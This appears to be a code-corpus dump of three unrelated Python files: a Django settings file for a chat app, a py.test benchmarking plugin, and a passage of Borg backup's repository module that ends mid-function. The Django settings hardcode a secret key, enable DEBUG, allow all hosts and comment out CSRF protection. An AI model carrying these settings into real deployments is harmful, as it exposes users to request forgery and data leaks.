Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$(_bts_5if59ns1(7u2!opjy*+3^+pwf_rr8=rm0o8ih+ts9xl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
from django_eventstream.utils import have_channels
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
if have_channels():
INSTALLED_APPS.append('channels')
INSTALLED_APPS.extend([
'django_eventstream',
'chat',
])
MIDDLEWARE = [
'django_grip.GripMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {}
import dj_database_url
DATABASES['default'] = dj_database_url.config(default='sqlite:///db.sqlite3')
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
ASGI_APPLICATION = 'server.routing.application'
GRIP_URL = os.environ.get('GRIP_URL')
EVENTSTREAM_STORAGE_CLASS = 'django_eventstream.storage.DjangoModelStorage'
|
py | 7dfa92949aac0aa05e8af4866b3c7bffb2046456 | """benchmarking through py.test"""
import py
from py.__.test.item import Item
from py.__.test.terminal.terminal import TerminalSession
from math import ceil, floor, log10
from time import time
import timeit
from inspect import getsource
# from IPython.Magic.magic_timeit
#units = ["s", "ms", "\xc2\xb5s", "ns"]
units = ["s", "ms", "us", "ns"]
scaling = [1, 1e3, 1e6, 1e9]
unitn = dict((s,i) for i,s in enumerate(units))
precision = 3
# like py.test Directory but scan for 'bench_<smth>.py'
class Directory(py.test.collect.Directory):
def filefilter(self, path):
b = path.purebasename
ext = path.ext
return b.startswith('bench_') and ext == '.py'
# like py.test Module but scane for 'bench_<smth>' and 'timeit_<smth>'
class Module(py.test.collect.Module):
def funcnamefilter(self, name):
return name.startswith('bench_') or name.startswith('timeit_')
# Function level benchmarking driver
class Timer(timeit.Timer):
def __init__(self, stmt, setup='pass', timer=timeit.default_timer, globals=globals()):
# copy of timeit.Timer.__init__
# similarity index 95%
self.timer = timer
stmt = timeit.reindent(stmt, 8)
setup = timeit.reindent(setup, 4)
src = timeit.template % {'stmt': stmt, 'setup': setup}
self.src = src # Save for traceback display
code = compile(src, timeit.dummy_src_name, "exec")
ns = {}
#exec code in globals(), ns -- original timeit code
exec code in globals, ns # -- we use caller-provided globals instead
self.inner = ns["inner"]
class Function(py.__.test.item.Function):
def __init__(self, *args, **kw):
super(Function, self).__init__(*args, **kw)
self.benchtime = None
self.benchtitle = None
def execute(self, target, *args):
# get func source without first 'def func(...):' line
src = getsource(target)
src = '\n'.join( src.splitlines()[1:] )
# extract benchmark title
if target.func_doc is not None:
self.benchtitle = target.func_doc
else:
self.benchtitle = src.splitlines()[0].strip()
# XXX we ignore args
timer = Timer(src, globals=target.func_globals)
if self.name.startswith('timeit_'):
# from IPython.Magic.magic_timeit
repeat = 3
number = 1
for i in range(1,10):
t = timer.timeit(number)
if t >= 0.2:
number *= (0.2 / t)
number = int(ceil(number))
break
if t <= 0.02:
# we are not close enough to that 0.2s
number *= 10
else:
# since we are very close to be > 0.2s we'd better adjust number
# so that timing time is not too high
number *= (0.2 / t)
number = int(ceil(number))
break
self.benchtime = min(timer.repeat(repeat, number)) / number
# 'bench_<smth>'
else:
self.benchtime = timer.timeit(1)
class BenchSession(TerminalSession):
def header(self, colitems):
#self.out.sep("-", "benchmarking starts")
super(BenchSession, self).header(colitems)
def footer(self, colitems):
super(BenchSession, self).footer(colitems)
#self.out.sep("-", "benchmarking ends")
self.out.write('\n')
self.print_bench_results()
def print_bench_results(self):
self.out.write('==============================\n')
self.out.write(' *** BENCHMARKING RESULTS *** \n')
self.out.write('==============================\n')
self.out.write('\n')
# benchname, time, benchtitle
results = []
for item, outcome in self._memo:
if isinstance(item, Item):
best = item.benchtime
if best is None:
# skipped or failed benchmarks
tstr = '---'
else:
# from IPython.Magic.magic_timeit
if best > 0.0:
order = min(-int(floor(log10(best)) // 3), 3)
else:
order = 3
tstr = "%.*g %s" % (precision, best * scaling[order], units[order])
results.append( [item.name, tstr, item.benchtitle] )
# dot/unit align second column
# FIXME simpler? this is crappy -- shame on me...
wm = [0]*len(units)
we = [0]*len(units)
for s in results:
tstr = s[1]
n,u = tstr.split()
# unit n
un = unitn[u]
try:
m,e = n.split('.')
except ValueError:
m,e = n,''
wm[un] = max(len(m), wm[un])
we[un] = max(len(e), we[un])
for s in results:
tstr = s[1]
n,u = tstr.split()
un = unitn[u]
try:
m,e = n.split('.')
except ValueError:
m,e = n,''
m = m.rjust(wm[un])
e = e.ljust(we[un])
if e.strip():
n = '.'.join((m,e))
else:
n = ' '.join((m,e))
# let's put the number into the right place
txt = ''
for i in range(len(units)):
if i == un:
txt += n
else:
txt += ' '*(wm[i]+we[i]+1)
s[1] = '%s %s' % (txt, u)
# align all columns besides the last one
for i in range(2):
w = max(len(s[i]) for s in results)
for s in results:
s[i] = s[i].ljust(w)
# show results
for s in results:
self.out.write('%s | %s | %s\n' % tuple(s))
def main(args=None):
# hook our Directory/Module/Function as defaults
from py.__.test import defaultconftest
defaultconftest.Directory = Directory
defaultconftest.Module = Module
defaultconftest.Function = Function
# hook BenchSession as py.test session
config = py.test.config
config._getsessionclass = lambda : BenchSession
py.test.cmdline.main(args)
|
py | 7dfa9317b61e8b492dde417cf8515ccbfae9a142 | import errno
import mmap
import os
import shutil
import stat
import struct
import time
from binascii import hexlify, unhexlify
from collections import defaultdict
from configparser import ConfigParser
from datetime import datetime
from functools import partial
from itertools import islice
from .constants import * # NOQA
from .hashindex import NSIndex
from .helpers import Error, ErrorWithTraceback, IntegrityError, format_file_size, parse_file_size
from .helpers import Location
from .helpers import ProgressIndicatorPercent
from .helpers import bin_to_hex
from .helpers import hostname_is_unique
from .helpers import secure_erase, truncate_and_unlink
from .helpers import msgpack
from .locking import Lock, LockError, LockErrorT
from .logger import create_logger
from .lrucache import LRUCache
from .platform import SaveFile, SyncFile, sync_dir, safe_fadvise
from .algorithms.checksums import crc32
from .crypto.file_integrity import IntegrityCheckedFile, FileIntegrityError
logger = create_logger(__name__)
MAGIC = b'BORG_SEG'
MAGIC_LEN = len(MAGIC)
ATTIC_MAGIC = b'ATTICSEG'
assert len(ATTIC_MAGIC) == MAGIC_LEN
TAG_PUT = 0
TAG_DELETE = 1
TAG_COMMIT = 2
FreeSpace = partial(defaultdict, int)
class Repository:
"""
Filesystem based transactional key value store
Transactionality is achieved by using a log (aka journal) to record changes. The log is a series of numbered files
called segments. Each segment is a series of log entries. The segment number together with the offset of each
entry relative to its segment start establishes an ordering of the log entries. This is the "definition" of
time for the purposes of the log.
Log entries are either PUT, DELETE or COMMIT.
A COMMIT is always the final log entry in a segment and marks all data from the beginning of the log until the
segment ending with the COMMIT as committed and consistent. The segment number of a segment ending with a COMMIT
is called the transaction ID of that commit, and a segment ending with a COMMIT is called committed.
When reading from a repository it is first checked whether the last segment is committed. If it is not, then
all segments after the last committed segment are deleted; they contain log entries whose consistency is not
established by a COMMIT.
Note that the COMMIT can't establish consistency by itself, but only manages to do so with proper support from
the platform (including the hardware). See platform.base.SyncFile for details.
A PUT inserts a key-value pair. The value is stored in the log entry, hence the repository implements
full data logging, meaning that all data is consistent, not just metadata (which is common in file systems).
A DELETE marks a key as deleted.
For a given key only the last entry regarding the key, which is called current (all other entries are called
superseded), is relevant: If there is no entry or the last entry is a DELETE then the key does not exist.
Otherwise the last PUT defines the value of the key.
By superseding a PUT (with either another PUT or a DELETE) the log entry becomes obsolete. A segment containing
such obsolete entries is called sparse, while a segment containing no such entries is called compact.
Sparse segments can be compacted and thereby disk space freed. This destroys the transaction for which the
superseded entries where current.
On disk layout:
dir/README
dir/config
dir/data/<X // SEGMENTS_PER_DIR>/<X>
dir/index.X
dir/hints.X
File system interaction
-----------------------
LoggedIO generally tries to rely on common behaviours across transactional file systems.
Segments that are deleted are truncated first, which avoids problems if the FS needs to
allocate space to delete the dirent of the segment. This mostly affects CoW file systems,
traditional journaling file systems have a fairly good grip on this problem.
Note that deletion, i.e. unlink(2), is atomic on every file system that uses inode reference
counts, which includes pretty much all of them. To remove a dirent the inodes refcount has
to be decreased, but you can't decrease the refcount before removing the dirent nor can you
decrease the refcount after removing the dirent. File systems solve this with a lock,
and by ensuring it all stays within the same FS transaction.
Truncation is generally not atomic in itself, and combining truncate(2) and unlink(2) is of
course never guaranteed to be atomic. Truncation in a classic extent-based FS is done in
roughly two phases, first the extents are removed then the inode is updated. (In practice
this is of course way more complex).
LoggedIO gracefully handles truncate/unlink splits as long as the truncate resulted in
a zero length file. Zero length segments are considered to not exist, while LoggedIO.cleanup()
will still get rid of them.
"""
class DoesNotExist(Error):
"""Repository {} does not exist."""
class AlreadyExists(Error):
"""A repository already exists at {}."""
class PathAlreadyExists(Error):
"""There is already something at {}."""
class ParentPathDoesNotExist(Error):
"""The parent path of the repo directory [{}] does not exist."""
class InvalidRepository(Error):
"""{} is not a valid repository. Check repo config."""
class InvalidRepositoryConfig(Error):
"""{} does not have a valid configuration. Check repo config [{}]."""
class AtticRepository(Error):
"""Attic repository detected. Please run "borg upgrade {}"."""
class CheckNeeded(ErrorWithTraceback):
"""Inconsistency detected. Please run "borg check {}"."""
class ObjectNotFound(ErrorWithTraceback):
"""Object with key {} not found in repository {}."""
def __init__(self, id, repo):
if isinstance(id, bytes):
id = bin_to_hex(id)
super().__init__(id, repo)
class InsufficientFreeSpaceError(Error):
"""Insufficient free space to complete transaction (required: {}, available: {})."""
class StorageQuotaExceeded(Error):
"""The storage quota ({}) has been exceeded ({}). Try deleting some archives."""
def __init__(self, path, create=False, exclusive=False, lock_wait=None, lock=True,
append_only=False, storage_quota=None, check_segment_magic=True,
make_parent_dirs=False):
self.path = os.path.abspath(path)
self._location = Location('file://%s' % self.path)
self.io = None # type: LoggedIO
self.lock = None
self.index = None
# This is an index of shadowed log entries during this transaction. Consider the following sequence:
# segment_n PUT A, segment_x DELETE A
# After the "DELETE A" in segment_x the shadow index will contain "A -> [n]".
self.shadow_index = {}
self._active_txn = False
self.lock_wait = lock_wait
self.do_lock = lock
self.do_create = create
self.created = False
self.exclusive = exclusive
self.append_only = append_only
self.storage_quota = storage_quota
self.storage_quota_use = 0
self.transaction_doomed = None
self.check_segment_magic = check_segment_magic
self.make_parent_dirs = make_parent_dirs
def __del__(self):
if self.lock:
self.close()
assert False, "cleanup happened in Repository.__del__"
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.path)
def __enter__(self):
if self.do_create:
self.do_create = False
self.create(self.path)
self.created = True
self.open(self.path, bool(self.exclusive), lock_wait=self.lock_wait, lock=self.do_lock)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
no_space_left_on_device = exc_type is OSError and exc_val.errno == errno.ENOSPC
# The ENOSPC could have originated somewhere else besides the Repository. The cleanup is always safe, unless
# EIO or FS corruption ensues, which is why we specifically check for ENOSPC.
if self._active_txn and no_space_left_on_device:
logger.warning('No space left on device, cleaning up partial transaction to free space.')
cleanup = True
else:
cleanup = False
self._rollback(cleanup=cleanup)
self.close()
@property
def id_str(self):
return bin_to_hex(self.id)
@staticmethod
def is_repository(path):
"""Check whether there is already a Borg repository at *path*."""
try:
# Use binary mode to avoid troubles if a README contains some stuff not in our locale
with open(os.path.join(path, 'README'), 'rb') as fd:
# Read only the first ~100 bytes (if any), in case some README file we stumble upon is large.
readme_head = fd.read(100)
# The first comparison captures our current variant (REPOSITORY_README), the second comparison
# is an older variant of the README file (used by 1.0.x).
return b'Borg Backup repository' in readme_head or b'Borg repository' in readme_head
except OSError:
# Ignore FileNotFound, PermissionError, ...
return False
def check_can_create_repository(self, path):
"""
Raise an exception if a repository already exists at *path* or any parent directory.
Checking parent directories is done for two reasons:
(1) It's just a weird thing to do, and usually not intended. A Borg using the "parent" repository
may be confused, or we may accidentally put stuff into the "data/" or "data/<n>/" directories.
(2) When implementing repository quotas (which we currently don't), it's important to prohibit
folks from creating quota-free repositories. Since no one can create a repository within another
repository, user's can only use the quota'd repository, when their --restrict-to-path points
at the user's repository.
"""
try:
st = os.stat(path)
except FileNotFoundError:
pass # nothing there!
else:
# there is something already there!
if self.is_repository(path):
raise self.AlreadyExists(path)
if not stat.S_ISDIR(st.st_mode) or os.listdir(path):
raise self.PathAlreadyExists(path)
# an empty directory is acceptable for us.
while True:
# Check all parent directories for Borg's repository README
previous_path = path
# Thus, path = previous_path/..
path = os.path.abspath(os.path.join(previous_path, os.pardir))
if path == previous_path:
# We reached the root of the directory hierarchy (/.. = / and C:\.. = C:\).
break
if self.is_repository(path):
raise self.AlreadyExists(path)
def create(self, path):
"""Create a new empty repository at `path`
"""
self.check_can_create_repository(path)
if self.make_parent_dirs:
parent_path = os.path.join(path, os.pardir)
os.makedirs(parent_path, exist_ok=True)
if not os.path.exists(path):
try:
os.mkdir(path)
except FileNotFoundError as err:
raise self.ParentPathDoesNotExist(path) from err
with open(os.path.join(path, 'README'), 'w') as fd:
fd.write(REPOSITORY_README)
os.mkdir(os.path.join(path, 'data'))
config = ConfigParser(interpolation=None)
config.add_section('repository')
config.set('repository', 'version', '1')
config.set('repository', 'segments_per_dir', str(DEFAULT_SEGMENTS_PER_DIR))
config.set('repository', 'max_segment_size', str(DEFAULT_MAX_SEGMENT_SIZE))
config.set('repository', 'append_only', str(int(self.append_only)))
if self.storage_quota:
config.set('repository', 'storage_quota', str(self.storage_quota))
else:
config.set('repository', 'storage_quota', '0')
config.set('repository', 'additional_free_space', '0')
config.set('repository', 'id', bin_to_hex(os.urandom(32)))
self.save_config(path, config)
def save_config(self, path, config):
config_path = os.path.join(path, 'config')
old_config_path = os.path.join(path, 'config.old')
if os.path.isfile(old_config_path):
logger.warning("Old config file not securely erased on previous config update")
secure_erase(old_config_path)
if os.path.isfile(config_path):
link_error_msg = ("Failed to securely erase old repository config file (hardlinks not supported>). "
"Old repokey data, if any, might persist on physical storage.")
try:
os.link(config_path, old_config_path)
except OSError as e:
if e.errno in (errno.EMLINK, errno.ENOSYS, errno.EPERM, errno.EACCES, errno.ENOTSUP, errno.EIO):
logger.warning(link_error_msg)
else:
raise
except AttributeError:
# some python ports have no os.link, see #4901
logger.warning(link_error_msg)
try:
with SaveFile(config_path) as fd:
config.write(fd)
except PermissionError as e:
# error is only a problem if we even had a lock
if self.do_lock:
raise
logger.warning("%s: Failed writing to '%s'. This is expected when working on "
"read-only repositories." % (e.strerror, e.filename))
if os.path.isfile(old_config_path):
secure_erase(old_config_path)
def save_key(self, keydata):
assert self.config
keydata = keydata.decode('utf-8') # remote repo: msgpack issue #99, getting bytes
self.config.set('repository', 'key', keydata)
self.save_config(self.path, self.config)
def load_key(self):
keydata = self.config.get('repository', 'key')
return keydata.encode('utf-8') # remote repo: msgpack issue #99, returning bytes
def get_free_nonce(self):
if self.do_lock and not self.lock.got_exclusive_lock():
raise AssertionError("bug in code, exclusive lock should exist here")
nonce_path = os.path.join(self.path, 'nonce')
try:
with open(nonce_path, 'r') as fd:
return int.from_bytes(unhexlify(fd.read()), byteorder='big')
except FileNotFoundError:
return None
def commit_nonce_reservation(self, next_unreserved, start_nonce):
if self.do_lock and not self.lock.got_exclusive_lock():
raise AssertionError("bug in code, exclusive lock should exist here")
if self.get_free_nonce() != start_nonce:
raise Exception("nonce space reservation with mismatched previous state")
nonce_path = os.path.join(self.path, 'nonce')
try:
with SaveFile(nonce_path, binary=False) as fd:
fd.write(bin_to_hex(next_unreserved.to_bytes(8, byteorder='big')))
except PermissionError as e:
# error is only a problem if we even had a lock
if self.do_lock:
raise
logger.warning("%s: Failed writing to '%s'. This is expected when working on "
"read-only repositories." % (e.strerror, e.filename))
def destroy(self):
"""Destroy the repository at `self.path`
"""
if self.append_only:
raise ValueError(self.path + " is in append-only mode")
self.close()
os.remove(os.path.join(self.path, 'config')) # kill config first
shutil.rmtree(self.path)
def get_index_transaction_id(self):
indices = sorted(int(fn[6:])
for fn in os.listdir(self.path)
if fn.startswith('index.') and fn[6:].isdigit() and os.stat(os.path.join(self.path, fn)).st_size != 0)
if indices:
return indices[-1]
else:
return None
def check_transaction(self):
index_transaction_id = self.get_index_transaction_id()
segments_transaction_id = self.io.get_segments_transaction_id()
if index_transaction_id is not None and segments_transaction_id is None:
# we have a transaction id from the index, but we did not find *any*
# commit in the segment files (thus no segments transaction id).
# this can happen if a lot of segment files are lost, e.g. due to a
# filesystem or hardware malfunction. it means we have no identifiable
# valid (committed) state of the repo which we could use.
msg = '%s" - although likely this is "beyond repair' % self.path # dirty hack
raise self.CheckNeeded(msg)
# Attempt to automatically rebuild index if we crashed between commit
# tag write and index save
if index_transaction_id != segments_transaction_id:
if index_transaction_id is not None and index_transaction_id > segments_transaction_id:
replay_from = None
else:
replay_from = index_transaction_id
self.replay_segments(replay_from, segments_transaction_id)
def get_transaction_id(self):
self.check_transaction()
return self.get_index_transaction_id()
def break_lock(self):
Lock(os.path.join(self.path, 'lock')).break_lock()
def migrate_lock(self, old_id, new_id):
# note: only needed for local repos
if self.lock is not None:
self.lock.migrate_lock(old_id, new_id)
def open(self, path, exclusive, lock_wait=None, lock=True):
self.path = path
try:
st = os.stat(path)
except FileNotFoundError:
raise self.DoesNotExist(path)
if not stat.S_ISDIR(st.st_mode):
raise self.InvalidRepository(path)
if lock:
self.lock = Lock(os.path.join(path, 'lock'), exclusive, timeout=lock_wait, kill_stale_locks=hostname_is_unique()).acquire()
else:
self.lock = None
self.config = ConfigParser(interpolation=None)
try:
with open(os.path.join(self.path, 'config')) as fd:
self.config.read_file(fd)
except FileNotFoundError:
self.close()
raise self.InvalidRepository(self.path)
if 'repository' not in self.config.sections() or self.config.getint('repository', 'version') != 1:
self.close()
raise self.InvalidRepository(path)
self.max_segment_size = parse_file_size(self.config.get('repository', 'max_segment_size'))
if self.max_segment_size >= MAX_SEGMENT_SIZE_LIMIT:
self.close()
raise self.InvalidRepositoryConfig(path, 'max_segment_size >= %d' % MAX_SEGMENT_SIZE_LIMIT) # issue 3592
self.segments_per_dir = self.config.getint('repository', 'segments_per_dir')
self.additional_free_space = parse_file_size(self.config.get('repository', 'additional_free_space', fallback=0))
# append_only can be set in the constructor
# it shouldn't be overridden (True -> False) here
self.append_only = self.append_only or self.config.getboolean('repository', 'append_only', fallback=False)
if self.storage_quota is None:
# self.storage_quota is None => no explicit storage_quota was specified, use repository setting.
self.storage_quota = parse_file_size(self.config.get('repository', 'storage_quota', fallback=0))
self.id = unhexlify(self.config.get('repository', 'id').strip())
self.io = LoggedIO(self.path, self.max_segment_size, self.segments_per_dir)
if self.check_segment_magic:
# read a segment and check whether we are dealing with a non-upgraded Attic repository
segment = self.io.get_latest_segment()
if segment is not None and self.io.get_segment_magic(segment) == ATTIC_MAGIC:
self.close()
raise self.AtticRepository(path)
def close(self):
if self.lock:
if self.io:
self.io.close()
self.io = None
self.lock.release()
self.lock = None
def commit(self, save_space=False):
"""Commit transaction
"""
# save_space is not used anymore, but stays for RPC/API compatibility.
if self.transaction_doomed:
exception = self.transaction_doomed
self.rollback()
raise exception
self.check_free_space()
self.log_storage_quota()
self.io.write_commit()
if not self.append_only:
self.compact_segments()
self.write_index()
self.rollback()
def _read_integrity(self, transaction_id, key):
integrity_file = 'integrity.%d' % transaction_id
integrity_path = os.path.join(self.path, integrity_file)
try:
with open(integrity_path, 'rb') as fd:
integrity = msgpack.unpack(fd)
except FileNotFoundError:
return
if integrity.get(b'version') != 2:
logger.warning('Unknown integrity data version %r in %s', integrity.get(b'version'), integrity_file)
return
return integrity[key].decode()
def open_index(self, transaction_id, auto_recover=True):
if transaction_id is None:
return NSIndex()
index_path = os.path.join(self.path, 'index.%d' % transaction_id)
integrity_data = self._read_integrity(transaction_id, b'index')
try:
with IntegrityCheckedFile(index_path, write=False, integrity_data=integrity_data) as fd:
return NSIndex.read(fd)
except (ValueError, OSError, FileIntegrityError) as exc:
logger.warning('Repository index missing or corrupted, trying to recover from: %s', exc)
os.unlink(index_path)
if not auto_recover:
raise
self.prepare_txn(self.get_transaction_id())
# don't leave an open transaction around
self.commit()
return self.open_index(self.get_transaction_id())
def prepare_txn(self, transaction_id, do_cleanup=True):
self._active_txn = True
if self.do_lock and not self.lock.got_exclusive_lock():
if self.exclusive is not None:
# self.exclusive is either True or False, thus a new client is active here.
# if it is False and we get here, the caller did not use exclusive=True although
# it is needed for a write operation. if it is True and we get here, something else
# went very wrong, because we should have a exclusive lock, but we don't.
raise AssertionError("bug in code, exclusive lock should exist here")
# if we are here, this is an old client talking to a new server (expecting lock upgrade).
# or we are replaying segments and might need a lock upgrade for that.
try:
self.lock.upgrade()
except (LockError, LockErrorT):
# if upgrading the lock to exclusive fails, we do not have an
# active transaction. this is important for "serve" mode, where
# the repository instance lives on - even if exceptions happened.
self._active_txn = False
raise
if not self.index or transaction_id is None:
try:
self.index = self.open_index(transaction_id, auto_recover=False)
except (ValueError, OSError, FileIntegrityError) as exc:
logger.warning('Checking repository transaction due to previous error: %s', exc)
self.check_transaction()
self.index = self.open_index(transaction_id, auto_recover=False)
if transaction_id is None:
self.segments = {} # XXX bad name: usage_count_of_segment_x = self.segments[x]
self.compact = FreeSpace() # XXX bad name: freeable_space_of_segment_x = self.compact[x]
self.storage_quota_use = 0
self.shadow_index.clear()
else:
if do_cleanup:
self.io.cleanup(transaction_id)
hints_path = os.path.join(self.path, 'hints.%d' % transaction_id)
index_path = os.path.join(self.path, 'index.%d' % transaction_id)
integrity_data = self._read_integrity(transaction_id, b'hints')
try:
with IntegrityCheckedFile(hints_path, write=False, integrity_data=integrity_data) as fd:
hints = msgpack.unpack(fd)
except (msgpack.UnpackException, msgpack.ExtraData, FileNotFoundError, FileIntegrityError) as e:
logger.warning('Repository hints file missing or corrupted, trying to recover: %s', e)
if not isinstance(e, FileNotFoundError):
os.unlink(hints_path)
# index must exist at this point
os.unlink(index_path)
self.check_transaction()
self.prepare_txn(transaction_id)
return
if hints[b'version'] == 1:
logger.debug('Upgrading from v1 hints.%d', transaction_id)
self.segments = hints[b'segments']
self.compact = FreeSpace()
self.storage_quota_use = 0
for segment in sorted(hints[b'compact']):
logger.debug('Rebuilding sparse info for segment %d', segment)
self._rebuild_sparse(segment)
logger.debug('Upgrade to v2 hints complete')
elif hints[b'version'] != 2:
raise ValueError('Unknown hints file version: %d' % hints[b'version'])
else:
self.segments = hints[b'segments']
self.compact = FreeSpace(hints[b'compact'])
self.storage_quota_use = hints.get(b'storage_quota_use', 0)
self.log_storage_quota()
# Drop uncommitted segments in the shadow index
for key, shadowed_segments in self.shadow_index.items():
for segment in list(shadowed_segments):
if segment > transaction_id:
shadowed_segments.remove(segment)
def write_index(self):
def flush_and_sync(fd):
fd.flush()
os.fsync(fd.fileno())
def rename_tmp(file):
os.rename(file + '.tmp', file)
hints = {
b'version': 2,
b'segments': self.segments,
b'compact': self.compact,
b'storage_quota_use': self.storage_quota_use,
}
integrity = {
# Integrity version started at 2, the current hints version.
# Thus, integrity version == hints version, for now.
b'version': 2,
}
transaction_id = self.io.get_segments_transaction_id()
assert transaction_id is not None
# Log transaction in append-only mode
if self.append_only:
with open(os.path.join(self.path, 'transactions'), 'a') as log:
print('transaction %d, UTC time %s' % (
transaction_id, datetime.utcnow().strftime(ISO_FORMAT)), file=log)
# Write hints file
hints_name = 'hints.%d' % transaction_id
hints_file = os.path.join(self.path, hints_name)
with IntegrityCheckedFile(hints_file + '.tmp', filename=hints_name, write=True) as fd:
msgpack.pack(hints, fd)
flush_and_sync(fd)
integrity[b'hints'] = fd.integrity_data
# Write repository index
index_name = 'index.%d' % transaction_id
index_file = os.path.join(self.path, index_name)
with IntegrityCheckedFile(index_file + '.tmp', filename=index_name, write=True) as fd:
# XXX: Consider using SyncFile for index write-outs.
self.index.write(fd)
flush_and_sync(fd)
integrity[b'index'] = fd.integrity_data
# Write integrity file, containing checksums of the hints and index files
integrity_name = 'integrity.%d' % transaction_id
integrity_file = os.path.join(self.path, integrity_name)
with open(integrity_file + '.tmp', 'wb') as fd:
msgpack.pack(integrity, fd)
flush_and_sync(fd)
# Rename the integrity file first
rename_tmp(integrity_file)
sync_dir(self.path)
# Rename the others after the integrity file is hypothetically on disk
rename_tmp(hints_file)
rename_tmp(index_file)
sync_dir(self.path)
# Remove old auxiliary files
current = '.%d' % transaction_id
for name in os.listdir(self.path):
if not name.startswith(('index.', 'hints.', 'integrity.')):
continue
if name.endswith(current):
continue
os.unlink(os.path.join(self.path, name))
self.index = None
def check_free_space(self):
"""Pre-commit check for sufficient free space to actually perform the commit."""
# As a baseline we take four times the current (on-disk) index size.
# At this point the index may only be updated by compaction, which won't resize it.
# We still apply a factor of four so that a later, separate invocation can free space
# (journaling all deletes for all chunks is one index size) or still make minor additions
# (which may grow the index up to twice its current size).
# Note that in a subsequent operation the committed index is still on-disk, therefore we
# arrive at index_size * (1 + 2 + 1).
# In that order: journaled deletes (1), hashtable growth (2), persisted index (1).
required_free_space = self.index.size() * 4
# Conservatively estimate hints file size:
# 10 bytes for each segment-refcount pair, 10 bytes for each segment-space pair
# Assume maximum of 5 bytes per integer. Segment numbers will usually be packed more densely (1-3 bytes),
# as will refcounts and free space integers. For 5 MiB segments this estimate is good to ~20 PB repo size.
# Add 4K to generously account for constant format overhead.
hints_size = len(self.segments) * 10 + len(self.compact) * 10 + 4096
required_free_space += hints_size
required_free_space += self.additional_free_space
if not self.append_only:
full_segment_size = self.max_segment_size + MAX_OBJECT_SIZE
if len(self.compact) < 10:
# This is mostly for the test suite to avoid overestimated free space needs. This can be annoying
# if TMP is a small-ish tmpfs.
compact_working_space = 0
for segment, free in self.compact.items():
try:
compact_working_space += self.io.segment_size(segment) - free
except FileNotFoundError:
# looks like self.compact is referring to a non-existent segment file, ignore it.
pass
logger.debug('check_free_space: few segments, not requiring a full free segment')
compact_working_space = min(compact_working_space, full_segment_size)
logger.debug('check_free_space: calculated working space for compact as %d bytes', compact_working_space)
required_free_space += compact_working_space
else:
# Keep one full worst-case segment free in non-append-only mode
required_free_space += full_segment_size
try:
st_vfs = os.statvfs(self.path)
except OSError as os_error:
logger.warning('Failed to check free space before committing: ' + str(os_error))
return
# f_bavail: even as root - don't touch the Federal Block Reserve!
free_space = st_vfs.f_bavail * st_vfs.f_frsize
logger.debug('check_free_space: required bytes {}, free bytes {}'.format(required_free_space, free_space))
if free_space < required_free_space:
if self.created:
logger.error('Not enough free space to initialize repository at this location.')
self.destroy()
else:
self._rollback(cleanup=True)
formatted_required = format_file_size(required_free_space)
formatted_free = format_file_size(free_space)
raise self.InsufficientFreeSpaceError(formatted_required, formatted_free)
def log_storage_quota(self):
if self.storage_quota:
logger.info('Storage quota: %s out of %s used.',
format_file_size(self.storage_quota_use), format_file_size(self.storage_quota))
def compact_segments(self):
"""Compact sparse segments by copying data into new segments
"""
if not self.compact:
return
index_transaction_id = self.get_index_transaction_id()
segments = self.segments
unused = [] # list of segments, that are not used anymore
logger = create_logger('borg.debug.compact_segments')
def complete_xfer(intermediate=True):
# complete the current transfer (when some target segment is full)
nonlocal unused
# commit the new, compact, used segments
segment = self.io.write_commit(intermediate=intermediate)
logger.debug('complete_xfer: wrote %scommit at segment %d', 'intermediate ' if intermediate else '', segment)
# get rid of the old, sparse, unused segments. free space.
for segment in unused:
logger.debug('complete_xfer: deleting unused segment %d', segment)
count = self.segments.pop(segment)
assert count == 0, 'Corrupted segment reference count - corrupted index or hints'
self.io.delete_segment(segment)
del self.compact[segment]
unused = []
logger.debug('compaction started.')
pi = ProgressIndicatorPercent(total=len(self.compact), msg='Compacting segments %3.0f%%', step=1,
msgid='repository.compact_segments')
for segment, freeable_space in sorted(self.compact.items()):
if not self.io.segment_exists(segment):
logger.warning('segment %d not found, but listed in compaction data', segment)
del self.compact[segment]
pi.show()
continue
segment_size = self.io.segment_size(segment)
